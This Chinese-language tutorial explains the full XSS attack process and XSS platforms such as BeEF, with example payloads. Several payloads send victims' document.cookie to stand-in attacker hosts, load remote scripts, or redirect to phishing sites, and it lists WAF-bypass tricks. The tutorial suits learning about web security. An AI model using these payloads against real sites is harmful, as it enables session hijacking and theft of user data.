五、web安全--XSS漏洞（1）--XSS漏洞利用全过程

本文章仅供学习交流，如作他用所承受的法律责任一概与作者无关

1、XSS漏洞利用全过程

1.1 寻找注入点：攻击者首先需要找到目标网站中可能存在XSS漏洞的注入点。这些注入点通常出现在用户输入能够直接输出到页面，且没有经过适当过滤或编码的地方，比如搜索框、留言板、评论区、URL参数、表单提交等位置。例如，一个简单的在线聊天应用，若未对用户输入的消息进行适当处理就直接显示在页面上，就可能成为注入点。

1.2 构造恶意脚本：

• 反射型XSS：攻击者构造一个包含恶意脚本的请求，并将其提交给目标网站。这个脚本通常是JavaScript代码，但也可能包括HTML或其他可由浏览器执行的代码。例如，构造一个恶意链接，将恶意脚本作为URL参数提交给服务器，如https://example.com/search?q=<script>alert('XSS')</script>。
• 存储型XSS：攻击者将恶意脚本提交到网站的数据库中。例如，在评论区提交包含恶意脚本的内容，如<script>alert('Stored XSS')</script>。
• DOM型XSS：攻击者构造恶意脚本，通过修改页面的DOM结构在客户端执行。例如，在浏览器控制台中修改某个HTML元素的内容，插入脚本<script>alert('DOM XSS')</script>。

1.3 触发攻击：

• 反射型XSS：攻击者通过URL参数或表单提交将恶意脚本发送给服务器。服务器没有对输入进行足够的检查，直接将脚本包含在响应中返回给用户。用户的浏览器收到响应后，执行了恶意脚本。
• 存储型XSS：恶意脚本被存储在服务器端数据库中，当其他用户访问包含该脚本的页面时，脚本会被检索出来并嵌入到页面中，用户的浏览器执行这些脚本。
• DOM型XSS：当用户访问包含恶意脚本的页面时，页面中的JavaScript代码在执行过程中，由于对用户输入的处理不当，导致恶意脚本被执行。

1.4 窃取数据或执行恶意操作：

• 窃取Cookie：攻击者可以利用窃取的Cookie冒充用户身份，进行非法操作。例如，通过以下脚本将受害者的Cookie悄无声息地发送至攻击者控制的服务器：

  var img = document.createElement('img');
  img.src = 'http://attacker-controlled-server.com/track?cookie=' + encodeURIComponent(document.cookie);
  img.style.display = 'none';
  document.body.appendChild(img);
  

• 篡改页面内容：攻击者可以修改页面内容，比如改变显示的文本、图片等，误导用户进行不安全的操作。

• 钓鱼攻击：通过伪造可信任的网站或消息，诱使用户泄露个人信息或点击恶意链接。例如，通过注入JavaScript代码片段，将用户强行引导至一个预先设定的恶意站点：

  <script>window.location.href = "http://钓鱼.com/";</script>
  

• 加载远程恶意脚本：攻击者可以构造恶意链接，通过社会工程学手段引诱用户点击，进而加载并执行远程服务器上的恶意脚本。例如：

  <script src="http://恶意网站.com/恶意.js"></script>
  

• 发起CSRF攻击：攻击者结合远程脚本加载技术，在受害者页面中嵌入外部恶意脚本，为发起CSRF攻击做好准备。加载的恶意脚本可能收集受害者当前页面的上下文信息，动态构建出与目标网站接口相匹配的CSRF请求。

2、XSS平台详解

2.1 XSS平台的核心功能

XSS平台（如XSS Hunter、BeEF）是攻击者用于管理和接收XSS攻击数据的自动化工具，其核心功能包括：

• 生成Payload：自动生成可绕过简单过滤的恶意脚本（如经过编码或混淆的JavaScript）。
• 接收数据：当受害者浏览器执行Payload后，平台会记录其Cookie、IP地址、浏览器信息等敏感数据。
• 远程控制：部分平台支持通过WebSocket等协议与受害者浏览器建立持久连接，实现实时控制。

2.2 XSS平台的高级功能

2.2.1 盲打XSS（Blind XSS）

针对无回显的注入点（如反馈表单），攻击者通过XSS平台生成Payload并盲测。若Payload执行成功，平台会收到数据，证明攻击成功。

2.2.2 结合CSRF攻击

在存储型XSS中注入CSRF代码，诱导受害者执行恶意操作（如转账、修改密码）。例如：

<script>window.location = "https://evil.com/csrf?token=" + document.cookie;
</script>

2.2.3 绕过WAF（Web应用防火墙）

XSS平台提供多种绕过技术：

• 编码Payload：如将<script>转换为Unicode或十六进制。
• 分片Payload：将Payload拆分为多个部分，通过前端JavaScript拼接执行。

2.3 XSS漏洞利用全过程

2.3.1 寻找注入点

攻击者通过扫描或手动测试，定位目标网站中未过滤用户输入的参数（如搜索框、评论区、URL参数等）。例如，某博客平台允许用户嵌入HTML代码，但未对<script>标签进行过滤。

2.3.2 构造Payload

攻击者利用XSS平台生成Payload，例如：

<script src="https://xss-platform.com/payload.js"></script>

或更隐蔽的编码形式：

<img src=x onerror="fetch('https://xss-platform.com/log?c='+encodeURIComponent(document.cookie))">

Payload会窃取Cookie并发送至XSS平台。

2.3.3 触发攻击

• 反射型XSS：攻击者诱导受害者点击恶意链接（如邮件、社交媒体消息）：

  https://example.com/search?q=<script>alert('XSS')</script>
  

  链接中的Payload会被服务器反射到页面中执行。

• 存储型XSS：攻击者在评论区提交Payload，其他用户访问时触发。

• DOM型XSS：通过修改URL的hash部分（如#<script>...</script>）触发前端JavaScript执行。

2.3.4 XSS平台接收数据

当受害者浏览器执行Payload后，XSS平台会记录以下数据：

• Cookie：用于会话劫持。
• IP地址：定位受害者地理位置。
• 浏览器信息：辅助构造针对性攻击。

2.3.5 进一步攻击

• 会话劫持：攻击者使用窃取的Cookie冒充受害者登录目标网站。
• 钓鱼攻击：通过修改页面内容诱导用户输入敏感信息。
• 键盘记录：部分平台支持注入键盘记录脚本，窃取用户输入。